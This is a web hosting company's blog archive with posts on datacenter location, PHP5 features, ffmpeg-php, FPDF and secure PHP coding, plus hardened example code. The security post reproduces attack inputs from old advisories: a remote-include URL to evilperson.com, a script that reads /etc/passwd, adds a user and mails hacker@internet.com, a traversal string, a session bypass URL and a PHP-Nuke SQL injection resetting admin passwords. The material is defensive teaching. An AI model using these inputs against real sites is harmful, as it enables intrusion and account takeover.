Web hosting datacenter proximity, does it matter?
Posted: November 6, 2007 at 9:49 pm |
(1) Comment
Many people shopping for web hosting add the datacenter's location to an already complicated equation, but it is rarely the most important factor. It is not unimportant either: you would at least want the datacenter on the same continent as you and your visitors.
If you and most of your clients are in North America, getting your hosting somewhere in southern Asia is not the smartest idea: every request crosses an ocean, and the site will crawl for you and for them.
However, if you take web hosting in a place such as Montreal, QC, which is about 5 hours north of New York, NY, the speed will not be noticeably different from hosting in New York itself; at the speeds the internet runs at, the difference between the two is close to nothing.
To conclude: get your web hosting from a company reasonably close to you. It does not need to be in the same city, but it should not be so far away that your web site is slow for its visitors.
Top 5 new (and cool!) features in PHP5 that you probably haven’t heard of
Posted: January 3, 2007 at 11:23 pm |
(27) Comments
PHP5 brought many new features, but because of its syntax changes a big percentage of the PHP developer base has not yet made the switch. Here are the top 5 new features that could change your mind.
5: Better error handling with exceptions
I’m sure every PHP developer has stared at the famous white screen with a “Syntax error”, clueless about where the error really is. With PHP5 you can catch PHP errors and do whatever you want with them, but that’s not all: they have also included exceptions, which most C++ or Java developers already use. The good part is that instead of the script simply failing with close to no information, you can put a few checks around the risky code and gather whatever you need, such as a print_r() of an array. I have written an article about this: http://vexxhost.com/blog/?p=21
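Here is an added example of what that looks like in practice (it is not code from the original post or from the linked article): a handler that turns PHP's own warnings into exceptions, a try/catch around the risky call, and the detailed message going to the server log rather than to the visitor's browser. The loadConfig() helper and the bad path it is given are made up for the example.

```php
<?php
// Added example (not from the original post): convert PHP warnings and
// notices into exceptions so they can be caught like any other error.
// ErrorException has been built into PHP since 5.1.

function errorToException($severity, $message, $file, $line)
{
    // Respect the @ operator and the current error_reporting() mask.
    if (!(error_reporting() & $severity)) {
        return false;
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
}
set_error_handler('errorToException');

// Hypothetical helper: loads an INI file and insists on one key being present.
function loadConfig($path)
{
    // parse_ini_file() only emits an E_WARNING on a missing file; with the
    // handler above that warning becomes an ErrorException we can catch.
    $config = parse_ini_file($path);
    if (!isset($config['db_host'])) {
        throw new RuntimeException('db_host missing from ' . basename($path));
    }
    return $config;
}

try {
    $config = loadConfig('/nonexistent/app.ini');   // constructed bad path
} catch (ErrorException $e) {
    // Full detail (path, line, original warning text) goes to the log only;
    // the visitor gets a generic message and learns nothing about the server.
    error_log('PHP warning caught: ' . $e->getMessage()
        . ' in ' . $e->getFile() . ':' . $e->getLine());
    echo "Configuration could not be loaded.\n";
} catch (RuntimeException $e) {
    error_log('Config problem: ' . $e->getMessage());
    echo "Configuration is incomplete.\n";
}
```

One caveat: set_error_handler() cannot catch parse errors. The white “Syntax error” screen happens before any of your code runs, so for that one the cure is display_errors=Off in production together with log_errors=On, so the message ends up in the error log instead of on the page.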
4: Completely rewritten MySQL extension
MySQL is PHP’s partner in crime. Many developers use it for their websites because it is one of the easiest free, open-source database systems around. However, its performance combined with PHP4 was close to poor. PHP5 introduces a newer, rewritten and optimized MySQL extension (mysqli) that is also compatible with MySQL 5.0, and it adds prepared statements, SSL connections and multi-query functions. Prepared statements are worth adopting on their own merits: with values bound separately from the query text, a request parameter can no longer rewrite your SQL.
3: A heck of a lot more useful functions
I have a few favorite PHP5 functions which save time while coding and improve the website’s performance. One of my favorites is __autoload(): it is called whenever code refers to a class that has not been defined yet, and it receives the class name as its argument. This is useful because you no longer need to manage which includes file X or Y needs, and it reduces the load for those who simply include every class in every single PHP file. Another favorite is file_put_contents(), which reduces the six lines of code needed to write something to a file to one.
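As an added example (not from the original post), here is an __autoload() that maps a class name to a file in one fixed directory, together with the one check that matters from a security point of view. Whenever the class name can come from a request (new $type, class_exists($type), or a framework that instantiates handlers by name), an autoloader that builds a path from it without validation is a file-inclusion hole. The class directory under the system temp directory and the Greeter class are constructed for the example; file_put_contents() writes the sample class file.

```php
<?php
// Added example (not from the original post): a validating __autoload().
// __autoload() is the PHP5 mechanism; it was deprecated in PHP 7.2 and
// removed in PHP 8, where spl_autoload_register() does the same job.

$classDir = sys_get_temp_dir() . '/autoload_demo';   // constructed location
if (!is_dir($classDir)) {
    mkdir($classDir, 0700);
}
define('CLASS_DIR', $classDir);

// Constructed sample class file, written in one call with file_put_contents().
file_put_contents(
    CLASS_DIR . '/Greeter.php',
    "<?php\nclass Greeter {\n    public function hello(\$name) { return \"Hello, \$name\"; }\n}\n",
    LOCK_EX
);

function __autoload($className)
{
    // Only plain identifiers are acceptable class names. Anything else
    // (slashes, "..", "http://", null bytes) is refused before it can
    // become part of a path.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*\z/', $className)) {
        throw new InvalidArgumentException("Refusing to autoload '$className'");
    }
    $file = CLASS_DIR . '/' . $className . '.php';
    if (!is_file($file)) {
        throw new RuntimeException("No class file for $className");
    }
    require $file;
}

// Normal use: the class name is a literal in the code.
$g = new Greeter();                       // loads Greeter.php on first use
echo $g->hello('world'), "\n";            // Hello, world

// Attacker-style class name, as it might arrive in a request parameter and
// reach class_exists() or new $type. The autoloader is invoked with the raw
// string and rejects it instead of touching the file system.
$bad = '../../../../etc/passwd';
try {
    class_exists($bad);
} catch (InvalidArgumentException $e) {
    echo 'Blocked: ', $e->getMessage(), "\n";
}
```

The regular expression, not the is_file() check, is what keeps this safe: is_file() would happily confirm that ../../../../etc/passwd exists, and require would then include it.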
2: Finally! SQLite database support!
I’m sure a lot of developers will be happy about this one. While MySQL is very popular among PHP developers, SQLite is much different from it: it reads and writes ordinary files and does not need a daemon (server) running in order to execute queries. That makes it a better, smaller database for low-traffic sites.
1: The best damn OOP support period
PHP programmers have spent an awfully long time creating hacks to turn PHP into a better OO programming language. Finally, they are rewarded with OO support that neither PHP3 nor PHP4 can match. It has everything you usually see in the other established languages: constructors, destructors, public, protected and private properties and methods, interfaces, abstract classes, class type hints, static properties and methods, final classes and methods, and a whole suite of magic methods.
That’s the top 5 for me. I hope you think that PHP5 deserves a try! (and we offer it with our hosting plans!)
What FFMPEG-PHP can do and how to use the most out of it
Posted: December 20, 2006 at 8:49 pm |
(9) Comments
You’ve probably heard of ffmpeg-php and its wide use on sites that deal with video, such as YouTube or any similar site. Here’s a short introduction to it and how to use it.
First thing, you’ve got to check that your web hosting provider actually has ffmpeg & ffmpeg-php extension installed on your account and then you could get started with ffmpeg. You can check if it’s installed by creating a PHP script and executing the following code:
extension_loaded('ffmpeg') or die("ffmpeg extension not loaded");
If you get “ffmpeg extension not loaded”, your web hosting provider does not have ffmpeg-php installed; if you get nothing, you’re on the right track!
ffmpeg-php is very simple to learn: it is essentially an interface to the ffmpeg software that makes it easy for PHP developers to access.
Like any object in PHP, you’ll have to start with creating a new instance of it. You can do that by using the following line:
$ffmpegInstance = new ffmpeg_movie("/path/to/movie/");
With that instance you can use the many features of ffmpeg-php, from getting the duration of the movie or audio file in seconds to retrieving its bitrate.
From here on it is plain object-oriented programming, for example:
$ffmpegInstance->getDuration(); // Gets the duration in secs.
$ffmpegInstance->getVideoCodec(); // What type of compression/codec used
This is very helpful when coding anything that involves uploaded videos, because you can learn a lot about a file before you accept it. I’ve made a small script that retrieves all the information ffmpeg-php can get right here
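Here is an added example of the upload case (it is not code from the original post): a handler that inspects a freshly uploaded video with ffmpeg-php and rejects it if it is not a video, is too long, or is too large. It assumes the ffmpeg extension is loaded, a form field named "video", and an upload directory outside the web root; the limits are arbitrary policy values. Besides getDuration() and getVideoCodec() from the post, it uses the ffmpeg-php methods hasVideo(), getFrameWidth() and getFrameHeight().

```php
<?php
// Added example (not from the original post): validate an uploaded video
// with ffmpeg-php before keeping it. Limits and paths are assumptions.

define('MAX_SECONDS', 600);                  // 10 minutes
define('MAX_WIDTH',   1920);
define('MAX_HEIGHT',  1080);
define('UPLOAD_DIR',  '/var/www/uploads');   // assumed; outside the web root

// Returns null when the file is acceptable, otherwise a short reason.
function checkUploadedVideo(array $upload)
{
    // Only open files PHP itself received in this request. ffmpeg_movie()
    // will open any path the web server can read, so a user-supplied path
    // must never reach it.
    if ($upload['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($upload['tmp_name'])) {
        return 'upload failed';
    }

    $movie = new ffmpeg_movie($upload['tmp_name']);

    if (!$movie->hasVideo()) {
        return 'no video stream found';
    }
    if ($movie->getDuration() > MAX_SECONDS) {
        return 'video too long (' . round($movie->getDuration()) . ' s)';
    }
    if ($movie->getFrameWidth() > MAX_WIDTH || $movie->getFrameHeight() > MAX_HEIGHT) {
        return 'resolution too high (' . $movie->getFrameWidth() . 'x'
            . $movie->getFrameHeight() . ')';
    }
    // Codec is informational here; a site could also whitelist it.
    error_log('accepted upload, codec ' . $movie->getVideoCodec());
    return null;
}

extension_loaded('ffmpeg') or die("ffmpeg extension not loaded");

if (!isset($_FILES['video'])) {
    header('HTTP/1.0 400 Bad Request');
    die('no file uploaded');
}

$problem = checkUploadedVideo($_FILES['video']);
if ($problem !== null) {
    header('HTTP/1.0 400 Bad Request');
    die('Rejected: ' . htmlspecialchars($problem));
}

// Store under a name we choose; the client-supplied name is not trusted.
$dest = UPLOAD_DIR . '/' . sha1_file($_FILES['video']['tmp_name']) . '.bin';
if (!move_uploaded_file($_FILES['video']['tmp_name'], $dest)) {
    die('could not store file');
}
echo 'Accepted ', htmlspecialchars($_FILES['video']['name']);
```

The order matters: is_uploaded_file() comes first, then the media checks, and only then move_uploaded_file(); a file that fails the checks never lands in the upload directory at all.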
Creating PDF’s on the fly using PHP & FPDF
Posted: December 3, 2006 at 12:27 pm |
(13) Comments
Generating PDFs is an easy way to offer a nice printable and/or savable version of an article. This could be useful on a WordPress blog or any articles website. The method shown here uses the popular FPDF class.
First of all, I suggest you get the latest FPDF version from here. Create a directory such as “pdf” on your web hosting space and place fpdf.php in it together with its font directory (FPDF reads the metrics for its core fonts from there); nothing else from the download is needed.
Let’s make our first “Hello World” example. Place the following in a file called test.php:
<?php
require('fpdf.php');
$pdf=new FPDF();
$pdf->AddPage();
$pdf->SetFont('Arial','B',16);
$pdf->Cell(40,10,'Hello World!');
$pdf->Output();
?>
Now let’s see that code line by line…
require('fpdf.php');
This line includes our FPDF class that we need to create the PDF file.
$pdf=new FPDF();
This line creates a new instance of the FPDF class and binds it to $pdf.
$pdf->AddPage();
This line tells FPDF to add a new page to the PDF file; obviously we need one page so we will call this function once.
$pdf->SetFont('Arial','B',16);
This line tells the FPDF class to change the font to Arial, bold, 16 pt.
$pdf->Cell(40,10,'Hello World!');
This line is just like PHP’s “echo”: text in a PDF is written into rectangular cells. Here the cell is 40 mm wide and 10 mm high (FPDF’s default unit is millimeters, not points), and the third value is the text to be written inside that box.
$pdf->Output();
Our final line, which pretty much means: “we’re done, show us our PDF!”
That’s a very simple use of FPDF. Here is a slightly more advanced version:
<?php
require('fpdf.php');
$pdf=new FPDF("L", "mm", "A4");
$pdf->AddPage();
$pdf->SetFont('Arial','BIU',30);
$pdf->SetTextColor(0,0,255);
$pdf->Cell(60,20,'PDF+PHP Test',1,1,'C',0);
$pdf->Output();
?>
Now let’s do a quick review of that more advanced code:
$pdf=new FPDF("L", "mm", "A4");
This will create a new instance but instead will default to creating landscape pages because of the first L, P can be used instead to default to portrait pages. The second value is the default measurement unit, a choice of point (pt), millimeter (mm), centimeter (cm) and inch (in) is given. The last value is the size of the page, the choice of A3, A4, A5, Letter & Legal is given.
$pdf->AddPage();
Simple function: it adds a page. You can force this page to be portrait (P) or landscape (L) by passing that as the first value (ex: $pdf->AddPage("L"), $pdf->AddPage("P")).
$pdf->SetFont('Arial','BIU',30);
This required function again says that we want Arial, this time at 30 points (font sizes are always given in points, regardless of the document’s unit); 'BIU' simply says that we want it bold, italic and underlined.
$pdf->SetTextColor(0,0,255);
This sets the default text color for the text we will be writing, I’ve chosen blue here, the first value is red (r), the second is green (g) & blue (b).
$pdf->Cell(60,20,'PDF+PHP Test',1,1,'C',0);
This makes the now-familiar rectangle, 60 mm wide and 20 mm high, with ‘PDF+PHP Test’ written in it. The 1 after the text draws a border around the cell (0 means no border). The next 1 means that once the cell is done, the cursor goes to the beginning of the next line; with 0 it stays to the right of the cell, and with 2 it goes below it. 'C' is the alignment of the text inside the box; possible values are left (L), center (C) and right (R). The final 0 means the cell gets no background fill.
$pdf->Output();
Output our brand new colorful PDF file!
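To show the blog use case the post mentions, here is an added example (not code from the original post or from FPDF itself) that turns an article into a downloadable PDF: wrapped paragraphs with MultiCell(), conversion of the UTF-8 text to the single-byte encoding the core fonts use, and a download file name derived from the title rather than from the request. It assumes fpdf.php 1.8 or later (for the Output('D', name) parameter order) and its font directory in the same place; the article text is constructed sample data.

```php
<?php
// Added example (not from the original post): an article rendered to a PDF
// with FPDF and sent as a download.
require('fpdf.php');

function buildArticlePdf($title, $author, $body)
{
    $pdf = new FPDF('P', 'mm', 'A4');
    $pdf->SetTitle($title);
    $pdf->SetAuthor($author);
    $pdf->SetMargins(20, 20);
    $pdf->AddPage();

    // The core fonts are single-byte (Windows-1252). Convert from UTF-8 and
    // transliterate what cannot be represented instead of emitting garbage.
    $title  = iconv('UTF-8', 'windows-1252//TRANSLIT', $title);
    $author = iconv('UTF-8', 'windows-1252//TRANSLIT', $author);
    $body   = iconv('UTF-8', 'windows-1252//TRANSLIT', $body);

    $pdf->SetFont('Arial', 'B', 18);
    $pdf->MultiCell(0, 9, $title, 0, 'L');        // width 0 = to the right margin
    $pdf->SetFont('Arial', 'I', 10);
    $pdf->Cell(0, 6, 'by ' . $author, 0, 1, 'L');
    $pdf->Ln(4);

    $pdf->SetFont('Times', '', 12);
    foreach (explode("\n\n", $body) as $paragraph) {
        // MultiCell wraps long lines and adds pages as needed.
        $pdf->MultiCell(0, 6, $paragraph, 0, 'J');
        $pdf->Ln(3);
    }
    return $pdf;
}

// Constructed sample article.
$article = array(
    'title'  => 'Creating PDFs on the fly',
    'author' => 'vexxhost',
    'body'   => "First paragraph of the sample article.\n\n"
              . str_repeat('Second paragraph, long enough to wrap across several lines. ', 12),
);

$pdf = buildArticlePdf($article['title'], $article['author'], $article['body']);

// The download name is built from the title and reduced to safe characters
// before it goes into a response header; it is never taken from the request.
$filename = preg_replace('/[^A-Za-z0-9_-]+/', '-', $article['title']) . '.pdf';
$pdf->Output('D', $filename);
```

Output('D', ...) sends the PDF as an attachment; Output() with no arguments, as in the post, sends it inline. Either way nothing else may have been printed before the call, since FPDF has to emit the Content-Type header itself.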
Thanks for reading!
Secure programming habits in PHP
Posted: November 4, 2006 at 4:27 pm |
(8) Comments
The goal of this article is to show common threats and challenges of programming secure PHP applications. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.
A site I will not name in this article (because the problem still has not been fixed) has a script that includes various HTML files and displays them in the proper layout. Have a look at the following URL:
http://example.com/page.php?i=contact.html
The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
- Has the programmer considered directory traversals like i=../../../etc/passwd?
- Does he check for the .html extension?
- Does he read the files with fopen() rather than include() them?
- Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:
http://example.com/page.php?i=http://evilperson.com/badscript.html
Where badscript.html contains a couple of lines of code:
<?php
passthru ('cat /etc/passwd');
passthru ('useradd myuser -p password');
passthru ('echo another hacked server! | mail hacker@internet.com');
?>
I am sure you get the idea. A lot of bad things can be done from here.
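As an added example (not from the original post), here is the page.php pattern just described, first as the vulnerable script does it and then hardened. The "pages/" directory of static HTML fragments next to the script is assumed for the example.

```php
<?php
// Added example (not from the original post): page.php before and after.
// "pages/" is an assumed directory of static HTML fragments.

// Vulnerable: the request parameter is the include path. i=../../../etc/passwd
// reads any file the httpd user can read, and when remote includes are on
// (allow_url_fopen before PHP 5.2, allow_url_include from 5.2 on)
// i=http://evilperson.com/badscript.html executes their code on your server.
function showPageVulnerable($i)
{
    include($i);
}

// Hardened: the parameter never turns into a path on its own.
function showPageHardened($i)
{
    $base = realpath(dirname(__FILE__) . '/pages');

    // 1. Drop any directory part, so "../" and absolute paths disappear.
    $file = basename($i);

    // 2. Only accept simple names with the expected extension. This also
    //    rejects URLs, null bytes and a trailing newline (\z, not $).
    if (!preg_match('/^[a-z0-9_-]+\.html\z/', $file)) {
        return notFound();
    }

    // 3. Resolve symlinks and confirm the result still lives under $base.
    $path = realpath($base . '/' . $file);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return notFound();
    }

    // 4. Output the fragment. readfile() never executes PHP code hidden in a
    //    fragment, which include() would.
    readfile($path);
    return true;
}

function notFound()
{
    header('HTTP/1.0 404 Not Found');
    echo 'No such page';
    return false;
}

showPageHardened(isset($_GET['i']) ? $_GET['i'] : 'contact.html');
```

The checks are deliberately redundant: basename() alone would let "http:" through, the pattern alone would not catch a symlink inside pages/ pointing elsewhere, and the realpath() containment check covers both. If the set of pages is small, a fixed array mapping names to files is even simpler and removes the file system from the decision entirely.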
By default, PHP writes most of the request variables into the global scope (the register_globals setting). Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.
The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.
This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified.
Under the ‘admin/’ directory, index.php checks whether the password matches the one in the database after posting the form:
<?php
if ($row['pass'] == $postedpass) {
session_register("name");
session_register("fullname");
session_register("id");
header("Location: index2.php");
}
?>
When the passwords match, the variables $name, $fullname and $id are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:
<?php
if (!$PHPSESSID) {
header("Location: index.php");
exit(0);
} else {
session_start();
if (!$name) session_register("name");
if (!$fullname) session_register("fullname");
if (!$id) session_register("id");
}
?>
If the session ID has not been set, the user is sent back to the login screen. If there is a session ID, though, the script resumes the session and puts the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL:
http://example.com/admin/index2.php?PHPSESSID=1&name=admin&fullname=brian&id=admin
The GET variables $PHPSESSID, $name, $fullname and $id are created as global variables by default. So when you look at the if-else structure above, you will notice that the script figures $PHPSESSID is set, and that the three variables dedicated to authorizing and identifying the user can be set to anything you want. The database has not even been queried. A quick fix for this problem (by far not the perfect one) would be to check $HTTP_SESSION_VARS['id'], or $_SESSION['id'] on PHP >= 4.1.0, instead of $id.
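Here is an added example (not the Mambo code and not from the original post) of the same login and protected page written so that neither register_globals nor session_register() play a role: input is read from $_POST only, authorization from $_SESSION only. It works on PHP >= 4.1 and uses a constructed in-memory user table in place of the database query; the password hashing uses crypt().

```php
<?php
// Added example (not from the original post): the admin login and the
// protected page without any reliance on global request variables.

function lookupUser($name)
{
    // Constructed sample data standing in for the users table. The stored
    // value is a crypt() hash, never the plaintext password.
    $users = array(
        'admin' => array(
            'id'       => 1,
            'fullname' => 'Brian',
            'pass'     => crypt('s3cret', '$1$demosalt$'),   // MD5-crypt
        ),
    );
    return isset($users[$name]) ? $users[$name] : null;
}

// index.php: only $_POST is consulted, and only after the row was checked.
function login()
{
    session_start();
    $name = isset($_POST['name']) ? $_POST['name'] : '';
    $pass = isset($_POST['pass']) ? $_POST['pass'] : '';

    $row = lookupUser($name);
    // crypt() with the stored hash as salt reproduces the hash if the
    // password matches. On PHP 5.5+ password_hash()/password_verify()
    // are the better choice.
    if ($row === null || crypt($pass, $row['pass']) !== $row['pass']) {
        return false;
    }

    // A fresh session id on login defeats fixation via ?PHPSESSID=....
    session_regenerate_id();
    $_SESSION['id']       = $row['id'];
    $_SESSION['name']     = $name;
    $_SESSION['fullname'] = $row['fullname'];
    return true;
}

// index2.php: authorization comes from $_SESSION and nowhere else. A request
// like ?PHPSESSID=1&id=admin is harmless: $_GET['id'] is never read, and an
// unknown session id simply yields an empty $_SESSION.
function requireLogin()
{
    session_start();
    if (empty($_SESSION['id'])) {
        header('Location: index.php');
        exit(0);
    }
    return $_SESSION['id'];
}

if (isset($_POST['name'])) {
    echo login() ? "logged in\n" : "bad credentials\n";
} else {
    $id = requireLogin();
    echo "welcome, user $id\n";
}
```

Two settings complete the picture: register_globals=Off, so the old pattern cannot come back by accident, and session.use_only_cookies=1, so a session id in the URL is ignored altogether.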
Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.
The following bug in PHP-Nuke 5.x was reported to the Bugtraq mailing list on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked variable in an SQL query.
The PHP-Nuke developers decided to add the “nuke” prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites run on the same database. By default, $prefix = "nuke"; is defined in the configuration file config.php.
Let us now look at a few lines from the script article.php.
<?php
if (!isset($mainfile)) {
include("mainfile.php");
}
if (!isset($sid) && !isset($tid)) {
exit();
}
?>
And a bit further down: the SQL query.
<?php
mysql_query("UPDATE ".$prefix."_stories SET counter=counter+1 where sid=$sid");
?>
To change the SQL query, we need to make sure $prefix is not set to its default value, so that we can set an arbitrary value via GET. The configuration file config.php is included by mainfile.php. As we know from the previous section, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script thinks mainfile.php has already been included and $prefix has been set accordingly. Now we are in a position to execute any SQL query starting with UPDATE. So the following request sets all admin passwords to ‘1′ (the authors table is nuke_authors, the default prefix plus _authors):
http://phpnukesite.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.nuke_authors%20set%20pwd=1%23
The query now looks like this:
UPDATE nuke.nuke_authors set pwd=1#_stories
SET counter=counter+1 where sid=1
Of course, anything after # will be considered as a comment and will be ignored.
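Note that $sid has the same problem on a smaller scale: it is interpolated unquoted, so a value such as 1%20or%201=1 rewrites the WHERE clause even with the prefix intact. As an added example (not from PHP-Nuke and not from the original post), here is the same fragment written so that neither variable can change the query: the prefix is a validated constant that no request parameter can replace, and the story id is a bound parameter of a prepared statement on the PHP5 mysqli extension. The connection details are placeholders.

```php
<?php
// Added example (not from the original post): article.php view counter
// without string-built SQL. Connection parameters are assumptions.

// config.php equivalent. A constant cannot be overwritten by a GET parameter
// named "prefix", whether or not mainfile.php was included.
define('TABLE_PREFIX', 'nuke');

// Table names cannot be bound parameters, so the one piece of the query that
// is assembled from a variable is restricted to identifier characters.
if (!preg_match('/^[A-Za-z0-9_]+\z/', TABLE_PREFIX)) {
    die('bad table prefix');
}

// Increments the view counter for one story; returns the number of rows hit.
function countArticleView(mysqli $db, $sid)
{
    $sql  = 'UPDATE `' . TABLE_PREFIX . '_stories`'
          . ' SET counter = counter + 1 WHERE sid = ?';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    // The value is sent separately from the query text, so "1 or 1=1" or
    // "1; UPDATE ..." is just a (non-matching) value, never SQL.
    $sid = (int) $sid;
    $stmt->bind_param('i', $sid);
    $stmt->execute();
    $rows = $stmt->affected_rows;
    $stmt->close();
    return $rows;
}

// Request handling: read $_GET explicitly and validate; no global variables.
if (!isset($_GET['sid']) || !ctype_digit($_GET['sid'])) {
    header('HTTP/1.0 400 Bad Request');
    exit('missing or invalid sid');
}

$db = @new mysqli('localhost', 'nuke', 'password', 'nuke');   // assumed
if (mysqli_connect_error()) {
    die('database connection failed');
}
$updated = countArticleView($db, $_GET['sid']);
echo $updated === 1 ? "counted\n" : "no such story\n";
```

With the prefix as a constant, the $mainfile trick from the advisory no longer matters: even if the rest of the initialization is skipped, there is no variable left for the attacker to supply.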
More to come. 